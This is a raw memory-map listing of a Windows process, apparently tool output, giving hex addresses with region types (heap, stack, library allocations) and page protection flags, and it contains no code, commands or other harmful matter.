trusted library allocation
page read and write
480000
trusted library section
page readonly
CF0000
heap
page read and write
38C000
heap
page read and write
2643000
trusted library allocation
page read and write
250E000
stack
page read and write
3376000
heap
page read and write
1D81000
trusted library allocation
page read and write
33B1000
heap
page read and write
884E000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
14E000
heap
page read and write
1E94000
heap
page read and write
1DA7000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
381000
heap
page read and write
A93000
trusted library allocation
page read and write
433000
trusted library allocation
page read and write
180000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
33BA000
heap
page read and write
858E000
trusted library allocation
page read and write
286E000
stack
page read and write
1DA7000
trusted library allocation
page read and write
51C000
heap
page read and write
3300000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
1F85000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
4798000
trusted library allocation
page read and write
10000
heap
page read and write
2DF0000
trusted library allocation
page read and write
658000
heap
page read and write
23CB000
trusted library allocation
page read and write
2910000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
2630000
heap
page execute and read and write
4BE000
heap
page read and write
4FC000
heap
page read and write
26A0000
trusted library allocation
page read and write
2F3D000
trusted library allocation
page read and write
4CE000
heap
page read and write
1F8E000
trusted library allocation
page read and write
33A9000
heap
page read and write
7FF0027D000
trusted library allocation
page execute and read and write
236C000
trusted library allocation
page read and write
1FB5000
trusted library allocation
page read and write
537000
heap
page read and write
2300000
heap
page read and write
12CF1000
trusted library allocation
page read and write
25ED000
stack
page read and write
1D81000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
23C6000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
44CC000
heap
page read and write
3474000
trusted library allocation
page read and write
3359000
heap
page read and write
1DA4000
trusted library allocation
page read and write
2DEB000
trusted library allocation
page read and write
314E000
stack
page read and write
301E000
trusted library allocation
page read and write
1C7D0000
heap
page read and write
4798000
trusted library allocation
page read and write
300000
heap
page read and write
33DF000
heap
page read and write
3300000
trusted library allocation
page read and write
4798000
trusted library allocation
page read and write
28ED000
stack
page read and write
8FDE000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
3DC000
heap
page read and write
7FF00240000
trusted library allocation
page read and write
33E7000
heap
page read and write
1DA7000
trusted library allocation
page read and write
1CF5000
trusted library allocation
page read and write
AB0000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
925E000
trusted library allocation
page read and write
536000
heap
page read and write
1CF000
heap
page read and write
2E8F000
trusted library allocation
page read and write
23DD000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
2EED000
trusted library allocation
page read and write
490000
heap
page read and write
2E16000
trusted library allocation
page read and write
1CB8000
trusted library allocation
page read and write
853E000
trusted library allocation
page read and write
33BB000
heap
page read and write
330000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
1C8A3000
heap
page read and write
1DA4000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
CE0000
heap
page read and write
47A4000
trusted library allocation
page read and write
27FA000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
1005A000
unkown
page readonly
86AE000
trusted library allocation
page read and write
3484000
trusted library allocation
page read and write
AD3000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
307E000
stack
page read and write
33B1000
heap
page read and write
4FC000
heap
page read and write
3080000
trusted library allocation
page read and write
1A0000
heap
page read and write
2FDE000
stack
page read and write
1F97000
trusted library allocation
page read and write
940000
trusted library allocation
page read and write
23C6000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
1CF0000
trusted library allocation
page read and write
86AE000
trusted library allocation
page read and write
12BAC000
trusted library allocation
page read and write
10000
heap
page read and write
44ED000
heap
page read and write
276F000
stack
page read and write
8FAE000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
144000
heap
page read and write
1DA7000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
240000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
1D50000
heap
page read and write
1F97000
trusted library allocation
page read and write
10053000
unkown
page read and write
1CC000
stack
page read and write
44A6000
heap
page read and write
33B3000
heap
page read and write
33A9000
heap
page read and write
27FA000
trusted library allocation
page read and write
330E000
heap
page read and write
47A4000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
210000
trusted library allocation
page read and write
710D000
heap
page read and write
236C000
trusted library allocation
page read and write
1F9D000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
46A0000
trusted library allocation
page read and write
1F97000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
4798000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
3200000
trusted library allocation
page read and write
B78000
heap
page read and write
2DF1000
trusted library allocation
page read and write
24CF000
stack
page read and write
3357000
heap
page read and write
10053000
unkown
page read and write
2E98000
trusted library allocation
page read and write
23C6000
trusted library allocation
page read and write
12C91000
trusted library allocation
page read and write
31A0000
trusted library allocation
page read and write
29F0000
trusted library allocation
page read and write
2E16000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
5B8000
heap
page read and write
1B250000
heap
page read and write
2E16000
trusted library allocation
page read and write
2EA3000
trusted library allocation
page read and write
2DCC000
trusted library allocation
page read and write
90FE000
trusted library allocation
page read and write
32FF000
heap
page read and write
8FDE000
trusted library allocation
page read and write
4C4000
trusted library allocation
page read and write
2A47000
heap
page read and write
1DA4000
trusted library allocation
page read and write
2980000
trusted library allocation
page read and write
4DB000
heap
page read and write
1DA7000
trusted library allocation
page read and write
482000
heap
page read and write
59A000
heap
page read and write
7FF0011A000
trusted library allocation
page execute and read and write
1F97000
trusted library allocation
page read and write
620000
heap
page read and write
310C000
stack
page read and write
1F89000
trusted library allocation
page read and write
B00000
heap
page read and write
33DD000
heap
page read and write
100000
heap
page read and write
2614000
trusted library allocation
page read and write
2C0000
trusted library allocation
page read and write
3050000
trusted library allocation
page read and write
2000000
heap
page read and write
1DA7000
trusted library allocation
page read and write
388000
heap
page read and write
1D64000
trusted library allocation
page read and write
504000
heap
page read and write
7FF00230000
trusted library allocation
page execute and read and write
1D81000
trusted library allocation
page read and write
3394000
heap
page read and write
33BA000
heap
page read and write
1DA4000
trusted library allocation
page read and write
1BA0000
heap
page read and write
4AA000
heap
page read and write
7FF001B0000
trusted library allocation
page read and write
386000
heap
page read and write
27D4000
trusted library allocation
page read and write
25F0000
heap
page read and write
3342000
heap
page read and write
44AC000
heap
page read and write
263000
trusted library allocation
page read and write
2FB4000
trusted library allocation
page read and write
3376000
heap
page read and write
1D81000
trusted library allocation
page read and write
2414000
heap
page read and write
1005A000
unkown
page readonly
2710000
heap
page read and write
236C000
trusted library allocation
page read and write
339E000
heap
page read and write
10053000
unkown
page read and write
3174000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
E0000
heap
page read and write
26B0000
trusted library allocation
page read and write
2DF0000
trusted library allocation
page read and write
23C6000
trusted library allocation
page read and write
33C7000
heap
page read and write
33BA000
heap
page read and write
3372000
heap
page read and write
1F97000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
3519000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
23DB000
trusted library allocation
page read and write
26BD000
trusted library allocation
page read and write
3050000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
C6000
stack
page read and write
4BE000
stack
page read and write
236C000
trusted library allocation
page read and write
1B3000
heap
page read and write
568000
heap
page read and write
2FBE000
stack
page read and write
2920000
trusted library allocation
page execute
236C000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
1F9F000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
286F000
stack
page read and write
900E000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
1F80000
trusted library allocation
page read and write
35D000
heap
page read and write
1D64000
trusted library allocation
page read and write
841E000
trusted library allocation
page read and write
393000
trusted library allocation
page read and write
23C2000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
1F8D000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
1D64000
trusted library allocation
page read and write
2E0E000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
30BE000
trusted library allocation
page read and write
1E9000
heap
page read and write
30CE000
stack
page read and write
9D0000
heap
page read and write
236C000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
54A000
heap
page read and write
2FE0000
trusted library allocation
page read and write
AF3000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
38D000
heap
page read and write
2410000
heap
page read and write
25F0000
trusted library allocation
page read and write
1CF9000
trusted library allocation
page read and write
81FE000
trusted library allocation
page read and write
339E000
heap
page read and write
14B000
stack
page read and write
840E000
trusted library allocation
page read and write
1D64000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
1C9AD000
stack
page read and write
2C9B000
trusted library allocation
page read and write
4798000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
2DAC000
trusted library allocation
page read and write
7FF001E0000
trusted library allocation
page execute and read and write
303E000
stack
page read and write
338E000
heap
page read and write
2910000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
1F8D000
trusted library allocation
page read and write
33AE000
heap
page read and write
1FB5000
trusted library allocation
page read and write
3392000
heap
page read and write
2E0E000
trusted library allocation
page read and write
23B9000
trusted library allocation
page read and write
1FB5000
trusted library allocation
page read and write
2EA7000
trusted library allocation
page read and write
2913000
trusted library allocation
page read and write
2DBC000
trusted library allocation
page read and write
23BF000
trusted library allocation
page read and write
1C77E000
stack
page read and write
360000
heap
page read and write
3487000
trusted library allocation
page read and write
7FF00200000
trusted library allocation
page execute and read and write
1DA4000
trusted library allocation
page read and write
24B0000
trusted library allocation
page read and write
1B3EE000
stack
page read and write
26C0000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
1FC0000
heap
page read and write
394000
trusted library allocation
page read and write
90EE000
trusted library allocation
page read and write
1F8D000
trusted library allocation
page read and write
2DE3000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
2470000
heap
page read and write
925E000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
264000
trusted library allocation
page read and write
1B97A000
trusted library allocation
page read and write
33A2000
heap
page read and write
30B4000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
2DF0000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
627000
heap
page read and write
47B0000
trusted library allocation
page read and write
173000
trusted library allocation
page read and write
56D000
heap
page read and write
2E25000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
1ABE0000
trusted library allocation
page read and write
1CB0E000
stack
page read and write
208000
heap
page read and write
47B0000
trusted library allocation
page read and write
1FB5000
trusted library allocation
page read and write
CA0000
heap
page read and write
1DA4000
trusted library allocation
page read and write
38D000
heap
page read and write
2DF0000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
25C0000
trusted library allocation
page read and write
2F0F000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
23C6000
trusted library allocation
page read and write
2E0C000
trusted library allocation
page read and write
1F0000
heap
page read and write
12DD0000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
352000
heap
page read and write
3362000
heap
page read and write
3190000
trusted library allocation
page read and write
2E0C000
trusted library allocation
page read and write
2E0C000
trusted library allocation
page read and write
4F0000
trusted library allocation
page read and write
10046000
unkown
page readonly
7E4000
trusted library allocation
page read and write
2C66000
trusted library allocation
page read and write
3323000
heap
page read and write
2C60000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
3372000
heap
page read and write
2E16000
trusted library allocation
page read and write
1D64000
trusted library allocation
page read and write
CF8000
heap
page read and write
1DA7000
trusted library allocation
page read and write
8F3E000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
1BC5E000
stack
page read and write
8DAE000
trusted library allocation
page read and write
23C1000
trusted library allocation
page read and write
33EF000
heap
page read and write
23DD000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
1F97000
trusted library allocation
page read and write
10000
heap
page read and write
33AC000
heap
page read and write
23DD000
trusted library allocation
page read and write
538000
heap
page read and write
2F5A000
trusted library allocation
page read and write
33DF000
heap
page read and write
1CE1000
trusted library allocation
page read and write
3314000
heap
page read and write
47A4000
trusted library allocation
page read and write
44E7000
heap
page read and write
1005A000
unkown
page readonly
760000
trusted library allocation
page read and write
1F97000
trusted library allocation
page read and write
8A0000
heap
page read and write
2DBA000
stack
page read and write
1DA4000
trusted library allocation
page read and write
2280000
heap
page read and write
26BD000
trusted library allocation
page read and write
1D64000
trusted library allocation
page read and write
298000
heap
page read and write
2E16000
trusted library allocation
page read and write
434000
trusted library allocation
page read and write
447000
heap
page read and write
2E0C000
trusted library allocation
page read and write
2E50000
trusted library allocation
page read and write
2E0C000
trusted library allocation
page read and write
386000
heap
page read and write
338E000
heap
page read and write
47B0000
trusted library allocation
page read and write
1FB5000
trusted library allocation
page read and write
1BE6000
heap
page read and write
26C0000
trusted library allocation
page read and write
33BA000
heap
page read and write
339D000
heap
page read and write
2F3A000
trusted library allocation
page read and write
334A000
heap
page read and write
10057000
unkown
page read and write
2E50000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
2DF0000
trusted library allocation
page read and write
337C000
heap
page read and write
8FAE000
trusted library allocation
page read and write
2926000
heap
page read and write
1F89000
trusted library allocation
page read and write
10000
heap
page read and write
10057000
unkown
page read and write
1DA4000
trusted library allocation
page read and write
190000
trusted library allocation
page read and write
950000
heap
page read and write
2C9B000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
3382000
trusted library allocation
page read and write
25E0000
trusted library allocation
page read and write
7FF0005C000
trusted library allocation
page execute and read and write
2DF0000
trusted library allocation
page read and write
25F0000
heap
page execute and read and write
23DB000
trusted library allocation
page read and write
520000
heap
page read and write
23DD000
trusted library allocation
page read and write
1FB5000
trusted library allocation
page read and write
51E000
stack
page read and write
335F000
heap
page read and write
1D81000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
22F0000
trusted library allocation
page read and write
2E16000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
2E16000
trusted library allocation
page read and write
4798000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
33A9000
heap
page read and write
1BB0000
heap
page read and write
22A0000
trusted library allocation
page read and write
10057000
unkown
page read and write
2DEC000
trusted library allocation
page read and write
1D54000
trusted library allocation
page read and write
2A0000
trusted library allocation
page read and write
2EFB000
trusted library allocation
page read and write
7E3000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
33B3000
heap
page read and write
33B5000
heap
page read and write
23CF000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
50D000
heap
page read and write
34A3000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
34B9000
trusted library allocation
page read and write
23CE000
trusted library allocation
page read and write
36B000
heap
page read and write
383000
heap
page read and write
2FB3000
trusted library allocation
page read and write
5BF000
heap
page read and write
380000
heap
page read and write
BA0000
heap
page read and write
3329000
heap
page read and write
1F98000
trusted library allocation
page read and write
30B0000
trusted library allocation
page read and write
24E0000
trusted library allocation
page read and write
2E0C000
trusted library allocation
page read and write
524000
heap
page read and write
23F0000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
32EB000
stack
page read and write
26C0000
trusted library allocation
page read and write
30EA000
trusted library allocation
page read and write
3329000
heap
page read and write
3041000
trusted library allocation
page read and write
29F7000
heap
page read and write
854000
heap
page read and write
47A4000
trusted library allocation
page read and write
1DA7000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
2E40000
trusted library allocation
page read and write
12B85000
trusted library allocation
page read and write
337E000
heap
page read and write
2EBC000
trusted library allocation
page read and write
A20000
heap
page read and write
23CD000
trusted library allocation
page read and write
23CA000
trusted library allocation
page read and write
7FF00217000
trusted library allocation
page read and write
12E32000
trusted library allocation
page read and write
33A9000
heap
page read and write
2F1E000
trusted library allocation
page read and write
36B000
heap
page read and write
1DA7000
trusted library allocation
page read and write
400000
heap
page read and write
841E000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
90AE000
trusted library allocation
page read and write
2E16000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
7FF00270000
trusted library allocation
page execute and read and write
44CE000
heap
page read and write
44ED000
heap
page read and write
23DD000
trusted library allocation
page read and write
353000
trusted library allocation
page read and write
3DC000
heap
page read and write
33A4000
heap
page read and write
460000
heap
page read and write
2590000
trusted library allocation
page read and write
925E000
trusted library allocation
page read and write
1F8D000
trusted library allocation
page read and write
23C6000
trusted library allocation
page read and write
2E08000
trusted library allocation
page read and write
90FE000
trusted library allocation
page read and write
2DB0000
trusted library allocation
page read and write
27EF000
stack
page read and write
1DA4000
trusted library allocation
page read and write
23C3000
trusted library allocation
page read and write
23C6000
trusted library allocation
page read and write
1D32000
trusted library allocation
page read and write
2E49000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
2914000
trusted library allocation
page read and write
398000
heap
page read and write
2750000
trusted library allocation
page read and write
33A4000
heap
page read and write
1BA20000
heap
page read and write
282E000
stack
page read and write
1DA7000
trusted library allocation
page read and write
3080000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
1F93000
trusted library allocation
page read and write
2923000
trusted library allocation
page execute
2DE7000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
44AC000
heap
page read and write
C64000
trusted library allocation
page read and write
2C64000
trusted library allocation
page read and write
3300000
trusted library allocation
page read and write
2EB8000
trusted library allocation
page read and write
464000
heap
page read and write
3327000
heap
page read and write
1DA4000
trusted library allocation
page read and write
10057000
unkown
page read and write
1D90000
trusted library allocation
page read and write
27FA000
trusted library allocation
page read and write
33AB000
trusted library allocation
page read and write
7FF00180000
trusted library allocation
page read and write
7FF0004A000
trusted library allocation
page execute and read and write
10000
heap
page read and write
7FF00110000
trusted library allocation
page read and write
2B7F000
stack
page read and write
26DE000
stack
page read and write
47A4000
trusted library allocation
page read and write
2E7F000
trusted library allocation
page read and write
1B20000
heap
page execute and read and write
2D0000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
3050000
trusted library allocation
page read and write
843E000
trusted library allocation
page read and write
2910000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
AA0000
heap
page read and write
47B0000
trusted library allocation
page read and write
1FB5000
trusted library allocation
page read and write
340000
heap
page read and write
7FF00290000
trusted library allocation
page read and write
233000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
26C0000
trusted library allocation
page read and write
2630000
trusted library allocation
page read and write
1FB5000
trusted library allocation
page read and write
23D0000
trusted library allocation
page read and write
33B5000
heap
page read and write
24E0000
trusted library allocation
page read and write
5BD000
heap
page read and write
7FF00280000
trusted library allocation
page execute and read and write
26BD000
trusted library allocation
page read and write
20000
heap
page read and write
3337000
heap
page read and write
2770000
trusted library allocation
page read and write
1CC8000
trusted library allocation
page read and write
1F89000
trusted library allocation
page read and write
1F97000
trusted library allocation
page read and write
4798000
trusted library allocation
page read and write
2A14000
trusted library allocation
page read and write
1D54000
trusted library allocation
page read and write
464000
heap
page read and write
3314000
heap
page read and write
1DA7000
trusted library allocation
page read and write
2921000
trusted library allocation
page execute
30BB000
trusted library allocation
page read and write
33BA000
heap
page read and write
7FF001F0000
trusted library allocation
page read and write
23B6000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
1D54000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
46A0000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
10053000
unkown
page read and write
8C0000
heap
page read and write
352000
heap
page read and write
1F83000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
2A00000
heap
page read and write
88DE000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
1F8D000
trusted library allocation
page read and write
4798000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
2E3000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
381000
heap
page read and write
26D0000
trusted library allocation
page read and write
1D2D000
stack
page read and write
2770000
trusted library allocation
page read and write
1F97000
trusted library allocation
page read and write
7FF002C0000
trusted library allocation
page execute and read and write
B30000
heap
page read and write
1DA7000
trusted library allocation
page read and write
1F8D000
trusted library allocation
page read and write
1CD1000
trusted library allocation
page read and write
10000
heap
page read and write
47D000
heap
page read and write
1005A000
unkown
page readonly
33DD000
heap
page read and write
2B81000
trusted library allocation
page read and write
2980000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
2DCF000
trusted library allocation
page read and write
30AE000
stack
page read and write
33B1000
heap
page read and write
EC000
stack
page read and write
47A4000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
350000
heap
page read and write
3B0000
heap
page read and write
47B0000
trusted library allocation
page read and write
34B3000
trusted library allocation
page read and write
26C0000
trusted library allocation
page read and write
2A7E000
heap
page read and write
47B0000
trusted library allocation
page read and write
260000
trusted library allocation
page read and write
1D64000
trusted library allocation
page read and write
2E0C000
trusted library allocation
page read and write
711A000
heap
page read and write
10046000
unkown
page readonly
388000
heap
page read and write
283000
trusted library allocation
page read and write
2AFB000
stack
page read and write
7C0000
heap
page read and write
3477000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
33AE000
heap
page read and write
884E000
trusted library allocation
page read and write
3019000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
3755000
trusted library allocation
page read and write
2864000
trusted library allocation
page read and write
10000
heap
page read and write
10000
heap
page read and write
A7E000
stack
page read and write
8F3E000
trusted library allocation
page read and write
47A4000
trusted library allocation
page read and write
23DB000
trusted library allocation
page read and write
2F15000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
886E000
trusted library allocation
page read and write
2DE1000
trusted library allocation
page read and write
25E3000
trusted library allocation
page read and write
7140000
heap
page read and write
3300000
trusted library allocation
page read and write
360000
heap
page read and write
2DF0000
trusted library allocation
page read and write
383000
heap
page read and write
4798000
trusted library allocation
page read and write
3FE000
heap
page read and write
1D90000
trusted library allocation
page read and write
2BDF000
trusted library allocation
page read and write
3300000
trusted library allocation
page read and write
3A0000
heap
page read and write
23FE000
stack
page read and write
2B7E000
stack
page read and write | page guard
26BD000
trusted library allocation
page read and write
7FF002A0000
trusted library allocation
page execute and read and write
1D55000
heap
page read and write
1DA7000
trusted library allocation
page read and write
33DF000
heap
page read and write
2A20000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
23DD000
trusted library allocation
page read and write
33AE000
heap
page read and write
374000
heap
page read and write
4D1000
heap
page read and write
670000
trusted library allocation
page read and write
379000
heap
page read and write
10046000
unkown
page readonly
3150000
trusted library allocation
page read and write
50D000
heap
page read and write
47A4000
trusted library allocation
page read and write
26BD000
trusted library allocation
page read and write
33B7000
heap
page read and write
2DEE000
trusted library allocation
page read and write
2390000
trusted library allocation
page read and write
1005A000
unkown
page readonly
AB0000
heap
page read and write
1DA7000
trusted library allocation
page read and write
3200000
trusted library allocation
page read and write
1F9C000
trusted library allocation
page read and write
3352000
heap
page read and write
1DC000
stack
page read and write
1E90000
heap
page read and write
1F87000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
21C0000
heap
page read and write
14C000
heap
page read and write
3686000
trusted library allocation
page read and write
283F000
stack
page read and write
1DA4000
trusted library allocation
page read and write
23DB000
trusted library allocation
page read and write
257F000
stack
page read and write
33C8000
heap
page read and write
331C000
heap
page read and write
B70000
heap
page read and write
1FB5000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
900000
heap
page read and write
337F000
heap
page read and write
7100000
heap
page read and write
7FF00250000
trusted library allocation
page execute and read and write
2770000
trusted library allocation
page read and write
352000
heap
page read and write
10000
heap
page read and write
2E7B000
trusted library allocation
page read and write
23C6000
trusted library allocation
page read and write
37B000
heap
page read and write
10046000
unkown
page readonly
1E0000
heap
page read and write
2E16000
trusted library allocation
page read and write
33AE000
heap
page read and write
33B5000
heap
page read and write
1DA7000
trusted library allocation
page read and write
354000
heap
page read and write
23C7000
trusted library allocation
page read and write
2E0C000
trusted library allocation
page read and write
3376000
heap
page read and write
1F89000
trusted library allocation
page read and write
1C890000
heap
page read and write
2E60000
trusted library allocation
page read and write
33C7000
heap
page read and write
1D64000
trusted library allocation
page read and write
3143000
trusted library allocation
page read and write
2E0E000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
644000
heap
page read and write
3323000
heap
page read and write
44CC000
heap
page read and write
2E4D000
trusted library allocation
page read and write
10053000
unkown
page read and write
3300000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
530000
heap
page read and write
2ED0000
trusted library allocation
page read and write
3FE000
heap
page read and write
47B0000
trusted library allocation
page read and write
348000
heap
page read and write
3458000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
2A13000
trusted library allocation
page read and write
26C0000
trusted library allocation
page read and write
1CA4E000
stack
page read and write
4798000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
6745000
heap
page read and write
236C000
trusted library allocation
page read and write
27FA000
trusted library allocation
page read and write
33DD000
heap
page read and write
2E0E000
trusted library allocation
page read and write
33B3000
heap
page read and write
886E000
trusted library allocation
page read and write
2E16000
trusted library allocation
page read and write
389000
heap
page read and write
1DA7000
trusted library allocation
page read and write
2AD9000
heap
page read and write
68A000
heap
page read and write
925E000
trusted library allocation
page read and write
1C520000
heap
page read and write
27D3000
trusted library allocation
page read and write
1D81000
trusted library allocation
page read and write
33BA000
heap
page read and write
47B0000
trusted library allocation
page read and write
2A75000
heap
page read and write
47B0000
trusted library allocation
page read and write
203B000
heap
page read and write
27FA000
trusted library allocation
page read and write
1F97000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
3342000
heap
page read and write
23DD000
trusted library allocation
page read and write
36C0000
heap
page read and write
37E000
heap
page read and write
2DEA000
trusted library allocation
page read and write
513000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
3448000
trusted library allocation
page read and write
23DB000
trusted library allocation
page read and write
10000000
unkown
page readonly
26C0000
trusted library allocation
page read and write
1DA4000
trusted library allocation
page read and write
580000
heap
page read and write
1F0000
trusted library allocation
page read and write
26C0000
trusted library allocation
page read and write
783000
trusted library allocation
page read and write
3080000
trusted library allocation
page read and write
2C40000
trusted library allocation
page read and write
2860000
trusted library allocation
page read and write
AD0000
trusted library allocation
page read and write
337E000
heap
page read and write
2F21000
trusted library allocation
page read and write
1D0000
heap
page read and write
47B0000
trusted library allocation
page read and write
C5000
stack
page read and write | page guard
2432000
heap
page read and write
1D81000
trusted library allocation
page read and write
290000
heap
page read and write
37B000
heap
page read and write
34A0000
trusted library allocation
page read and write
374000
trusted library allocation
page read and write
30A1000
trusted library allocation
page read and write
2E0E000
trusted library allocation
page read and write
33DD000
heap
page read and write
1F9E000
trusted library allocation
page read and write
336000
heap
page read and write
26B000
stack
page read and write
478000
heap
page read and write
23C9000
trusted library allocation
page read and write
1F8D000
trusted library allocation
page read and write
1D64000
trusted library allocation
page read and write
140000
heap
page read and write
47B0000
trusted library allocation
page read and write
9B000
stack
page read and write
2A6000
heap
page read and write
286A000
trusted library allocation
page read and write
26C0000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
2DC2000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
18D000
heap
page read and write
26EB000
trusted library allocation
page read and write
33B1000
heap
page read and write
4798000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
2FE3000
trusted library allocation
page read and write
26BD000
trusted library allocation
page read and write
236C000
trusted library allocation
page read and write
23C8000
trusted library allocation
page read and write
2E16000
trusted library allocation
page read and write
3A0000
heap
page read and write
4798000
trusted library allocation
page read and write
379000
heap
page read and write
886E000
trusted library allocation
page read and write
30B0000
trusted library allocation
page read and write
1005A000
unkown
page readonly
2DF0000
trusted library allocation
page read and write
387000
heap
page read and write
1F86000
trusted library allocation
page read and write
381000
heap
page read and write
565000
heap
page read and write
1F8D000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
1F91000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
1A4000
trusted library allocation
page read and write
373000
heap
page read and write
4AA000
heap
page read and write
33A4000
heap
page read and write
33B7000
heap
page read and write
915E000
trusted library allocation
page read and write
1BA4000
heap
page read and write
2DE1000
trusted library allocation
page read and write
2E16000
trusted library allocation
page read and write
303C000
stack
page read and write
2DEE000
trusted library allocation
page read and write
284000
trusted library allocation
page read and write
47B0000
trusted library allocation
page read and write
1F99000
trusted library allocation
page read and write
886E000
trusted library allocation
page read and write
2940000
heap
page read and write
27EE000
stack
page read and write
2AF9000
heap
page read and write
1FB5000
trusted library allocation
page read and write
2E50000
trusted library allocation
page read and write
1D90000
trusted library allocation
page read and write
2E0C000
trusted library allocation
page read and write
EC000
stack
page read and write
47A4000
trusted library allocation
page read and write
7FF00115000
trusted library allocation
page read and write
88DE000
trusted library allocation
page read and write
711A000
heap
page read and write
